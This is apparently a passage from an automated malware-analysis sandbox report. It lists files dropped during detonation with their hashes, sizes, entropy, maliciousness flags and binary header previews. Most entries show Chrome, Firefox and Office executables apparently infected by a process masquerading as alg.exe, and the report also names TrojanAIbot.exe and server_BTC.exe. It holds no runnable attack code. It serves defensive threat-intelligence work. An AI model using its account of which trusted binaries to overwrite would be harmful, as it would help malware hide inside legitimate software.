SHA1:	D6681B0C1E055FE2004AE699C9A14212487B9A09
SHA-256:	5783562204605D180D4893F873FAD67D75BB533460BD4F6B24ABD7ACD6AF0E0C
SHA-512:	BD2F2B3F84AD3FC6B2AC5DE90A3334AF1D7B1E4E4A7EC16C8B37D145EC454F2447B55954CAD0E79F8CAA2C9FC1909A37FBB44C36DD4582125214FC3583D47108
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......."... .......... ......................................P...\|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4971008
Entropy (8bit):	6.670827002337116
Encrypted:	false
SSDEEP:	49152:DErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+M9:lA4oGlcR+glEdOPKzgVZED527BWG
MD5:	1EDEC958796E0C8E43A0CF1B3B0B5C19
SHA1:	BFFA31D5A7AB1DAE5F743298E45D7CB33B9E8C33
SHA-256:	6BA4D77B9F3FDC0339873AB734197D2DE3B29EAF00FFBB031F8F5015AB16DF6F
SHA-512:	DBAADB05F4F4BB627656D90B3D0A3E7A8DE95CF592E99C77F6BAADC2847FE7ABA3A4563C8C74324EFCE6788B0371F6D6F0434BBD6A7F7CCE9099003686BF9872
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......'L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.829766542615968
Encrypted:	false
SSDEEP:	49152:I8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKq:Tv2gM+qwXLg7pPgw/DSZHWD527BWG
MD5:	37EDD3C9C7482E181E4F5CE70586C6C8
SHA1:	3CF75AE7450967656D2214751F790BA7640BDD54
SHA-256:	208B6FDDF2618B9CA3EB2C3748F0B5C81BE88A3D84F86756EAAAC0CC063BDA32
SHA-512:	08B90008A142A27312C8003BA301875DDA57317D3F48F0C8EDD6D9F68B4BCCC793A9F9D86BDB4DA1D5930D119502FFD8F39FE74DF02FA04EDC56E6D573519D7C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.829768290817003
Encrypted:	false
SSDEEP:	49152:e8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKq:9v2gM+qwXLg7pPgw/DSZHWD527BWG
MD5:	805AD4804417B26595637DCE464DDCB7
SHA1:	9E98E584EBBFAC6656DAD8647C3ECF424C329CF8
SHA-256:	A8932375D5200A49E8855CF3D24D285B54B6C04D04EDF113E6894CF61E26BF24
SHA-512:	F510D670212988316135132A4771927A59563025A5E9720293327444B84C72F0464F345F3A3312645AAECCEE4C5D72E1EDCC31856A68775BF043613165E65E6F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L......5K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2156544
Entropy (8bit):	6.95358499612137
Encrypted:	false
SSDEEP:	24576:CtjqL8fH+8aUbp8D/8+xyWAtsqjnhMgeiCl7G0nehbGZpbD:6jKK+81FI/8z3Dmg27RnWGj
MD5:	2D73F8C6928AE56B09347C6F3FD4A64F
SHA1:	DC396D2329085E111460C038F056F071A16B4515
SHA-256:	7054260F8421987838478E354E13B1AFA4E3452B96146DC35119ADADDC4FEE8F
SHA-512:	C6C08D38006272CBD5843E33A3C9888A0E899A81212C649ECAF6D5889ADC5FE773DC37915D47843AF170E454E4B5927EDBB10CF8FBD8499C0116CDC176EDB3E6
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......F.....................@.............................P".....KQ!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2370560
Entropy (8bit):	7.03239362432075
Encrypted:	false
SSDEEP:	49152:+AMsOu3JfCIGnZuTodRFYKBrFDbWpBDmg27RnWGj:+AMa38ZuTSED527BWG
MD5:	CF25F409B3770425141654B30C9861AE
SHA1:	8AC9DC3488422415160B853045104B88D3EBBDDE
SHA-256:	9F3EB6FC4C405F0C0EAA0E3B7B53035D5F308F4CDE4FDC3B424511D8A5A5D12A
SHA-512:	F1F3967BA426DFDA027532AEF3DC59B6D59BE30E956518AAC7EF9005AAA9F8450062844903A254FC337387DDA999CCF88646ACE1E64FA294086C21EE5D75173C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e..........".................0..........@..............................%.....%n$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1984512
Entropy (8bit):	7.104336220470566
Encrypted:	false
SSDEEP:	24576:KwbK7tnhD4aH6wD2Krx5NgOOagQE8J5sqjnhMgeiCl7G0nehbGZpbD:KSK7Fhslq2EPfOGEgDmg27RnWGj
MD5:	CD1AE02BDA9290CD777701464FC262CB
SHA1:	DA7717AE2A1C7070D0A85D5A1290CE94C0807512
SHA-256:	11C455852DF444CC454BE95457B6C18E193CCCC09F4E461059E797D8E226EE8C
SHA-512:	A4583FD4115807D9C644FDA516396DF29C062C23E1ECE9CB0C36188577022EFDC5D1BD93F09DA05F2D95348C9D23F6F35870355A5F001407BF0338347FF56858
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1779712
Entropy (8bit):	7.158063593224285
Encrypted:	false
SSDEEP:	24576:8KI7Twj5KDHxJ1FxyD+/wsG18bbQpsqjnhMgeiCl7G0nehbGZpbD:8v7e0j31mD+/wDGbqDmg27RnWGj
MD5:	F7D1A7F651741B360E128B421545A6DB
SHA1:	17E190D18986FADAA3C863C61B8466CF8DB5E881
SHA-256:	7AC41D46336B5F06B7CD58947B032585C183FA9C1606E5EAC09E90701DBD26BC
SHA-512:	4D223F9433A4A2A00B8ECFD0E9EBBD5C1AAA159E360C755CBBC8AB3D03273C4894F9B2AF9727FF6E1001B3F40B4C27CE69917C45FEC26B12568DD2D2AADC7D22
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."..........B.................@....................................>..... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).........................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.....................@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

C:\Program Files\Mozilla Firefox\crashreporter.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1378304
Entropy (8bit):	5.377429383394825
Encrypted:	false
SSDEEP:	12288:BQUVPDHhSiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:SyhSisqjnhMgeiCl7G0nehbGZpbD
MD5:	EFE12D6468B04066A58B1117A3486AAD
SHA1:	DE759A8B42384DC3E5FF5A5D3CFC390F3FC4A07B
SHA-256:	20263538116BD0A2E33080D8339F29D8C4105940B4BAC85112AF1A1BB23BEC10
SHA-512:	B3B90C050C5CF521285E5C620F3537AC6524A2C603766DF41BEAC89C4C3F0153573DC379926170AFAE9A2FA26BBFF3599CC7B5F052480F48402AC4928391750B
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p.......L.... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\default-browser-agent.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1286656
Entropy (8bit):	7.222113157567887
Encrypted:	false
SSDEEP:	24576:lsFfc1VyFn5UQn652bO4HRsqjnhMgeiCl7G0nehbGZpbD:lsFcIn5rJDDmg27RnWGj
MD5:	A374801AD8987C0507199FD3856093B9
SHA1:	4C4E7A13B86E811126769FD5019FF8CE2A1F01F4
SHA-256:	6F03B31623665874EA0D033ABCDF9BC5EB90C4474853DC216944D3BCCA16C1AF
SHA-512:	BB48545E843149B2322288D22D262AC0CB25137A8078021499514751AAF718570499DC50F286B028CED95A8DFE7A25451545AC769DED6E4A180293C37BA2AF8B
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................^..... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\firefox.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1246208
Entropy (8bit):	7.494270849243904
Encrypted:	false
SSDEEP:	24576:Yt9o6p4xQbiKI69wpemIwpel9+sqjnhMgeiCl7G0nehbGZpbD:Yt9faQbtl2peapelIDmg27RnWGj
MD5:	6EDFBEE554503AF60FF9ECA839910640
SHA1:	C5E93139F475590AA70642F6DEC07C96410302A5
SHA-256:	73B77CB60BB1A80FF8B87A625296C5320D7CEE419B13975B2F0726E8F247E0ED
SHA-512:	6DDAF007543208470DAB8919F965AF028131A276539FEA898A590A850096B4907B390F4B9BE69CAB961A552F16B5FC26F5C8CD7A0FA3EDBF4F2B10A7B3DB6546
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@..................................../d.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\maintenanceservice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.347833846622866
Encrypted:	false
SSDEEP:	24576:IQVTZu0JpsqjnhMgeiCl7G0nehbGZpbD:nVTZu4Dmg27RnWGj
MD5:	795D359CD308ABAB62B87D7F61D31D57
SHA1:	E4B71687809B519B97558FBB9B0EA5057E3D5745
SHA-256:	4969F9E1C1FF136ED26FB4F2061A428CB6083FB368269BDE01F2D19B967A16A9
SHA-512:	671D417A60EA5B164E0F4D79FAD3C952216FF0F9EB4D072BFCF27C6A759AEC46D0D4899DC761031EB594021265389AD31B996DFAF25C68AFE10CA52200193396
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P......H..... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1344000
Entropy (8bit):	6.808372391124874
Encrypted:	false
SSDEEP:	24576:+C1vpgXcZHzPsqjnhMgeiCl7G0nehbGZpbD:+C1vpIcNzDmg27RnWGj
MD5:	237892A71E137F808A2E454A13AA91B3
SHA1:	90DF3ECED8E9AD75DB12B604F43C58EB22094D61
SHA-256:	F4AF787BB27C08A59E925023A0D423DDE89ACED3FDBD86C7BD920066C7D41FFB
SHA-512:	DA0E6F994AD4193C5A514C746953F9A991BD5EC40E7ED3573015801B1F1E08B083F744D75578A940F4562E3E90A820E5A74BCAA5D610F7460328E7349CE3A5C2
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\pingsender.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1200128
Entropy (8bit):	5.1400221355008275
Encrypted:	false
SSDEEP:	12288:vSwjLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:vvLsqjnhMgeiCl7G0nehbGZpbD
MD5:	EBE7FF8D48D7F0908D456240438C8E00
SHA1:	FF31BBF0EA9D350CDF1613DE4842CFBAA0A8615D
SHA-256:	6F2F633CF285B2B57DF1971797A1FBB1C9B511EB1F97074D33BFBED6165C1980
SHA-512:	274FC31F63B093C5D04DBF0723E5F7F9B2F637BE33837A24CDBE615B4AFE8AE54127B2EF7E381314C22B480063CF533EC8F6B6EA61AC6BA6775A71EBBDFCB442
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.....................................G.... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\plugin-container.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1408512
Entropy (8bit):	5.441149377531119
Encrypted:	false
SSDEEP:	24576:vWKntIfGp5sqjnhMgeiCl7G0nehbGZpbD:O8IeLDmg27RnWGj
MD5:	DAC43908EA817E97DDB10DE7702C78C1
SHA1:	E2B774076C38BB689F2486E1665B3E07C29465FC
SHA-256:	82B21937836C981617167120D88E7DCA44F8782FA0ED770EDB9964B258770871
SHA-512:	3682E80D7C50DCD2D802EF12C26504085F3D007613B080193EC7866D58285C98004ACFAB3710953DFFBBEE90AED7371652C437A6C2DC31929A002D74ABBBA9DF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.......................................... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\private_browsing.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1185280
Entropy (8bit):	5.103286076418395
Encrypted:	false
SSDEEP:	12288:bIhXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:aXsqjnhMgeiCl7G0nehbGZpbD
MD5:	1B03E62AE83A5BD7901CEE03A30B31F1
SHA1:	176D0A657B0B25D3052C65ED2CA02FE70E2DC6CF
SHA-256:	0A2D93A2CBB89E2BC64FF669E92297BDE7735275E71169A8C99BF5898DD019E7
SHA-512:	7B5303BB28879E900DA3644D5A3AF1FEF724F0E0AFE4362D71085E2943A6494A8D4F7CDDEAC3BB5B05497CFC7EE1820E7719F83CA0C0C23FCCFCFEFDC066E417
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\updater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1531904
Entropy (8bit):	5.42119822213304
Encrypted:	false
SSDEEP:	24576:P8oREwt2ioQ3J+ROsqjnhMgeiCl7G0nehbGZpbD:P8oRpoFiDmg27RnWGj
MD5:	C67BD21E5EE00AEFDF837D519C3D8D38
SHA1:	78CB257AFDD79082F1AC09DB2C16B2EF2E7B68B0
SHA-256:	51683C5358B22B0B2EF19CDC2D507CDE391A06204254E80B1A46E75D1B410CC5
SHA-512:	E9508EC5DD24296A31234568AF9B5D8D0AE11E78F2B2F3895ABC4A77701F027EEA7E5C1B3390B58DC1A8C992CA88C877BFD2EAF79A78C4B6D756CBCC53E22B77
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.......................................... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulDm0ll//Z:NllU6cl/
MD5:	DA1F22117B9766A1F0220503765A5BA5
SHA1:	D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
SHA-256:	BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
SHA-512:	520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
Malicious:	true
Reputation:	unknown
Preview:	@...e.................................R..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tgevfpz.mry.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4epfqf5y.ttm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jiirpg3t.gfw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfkscmkb.upb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
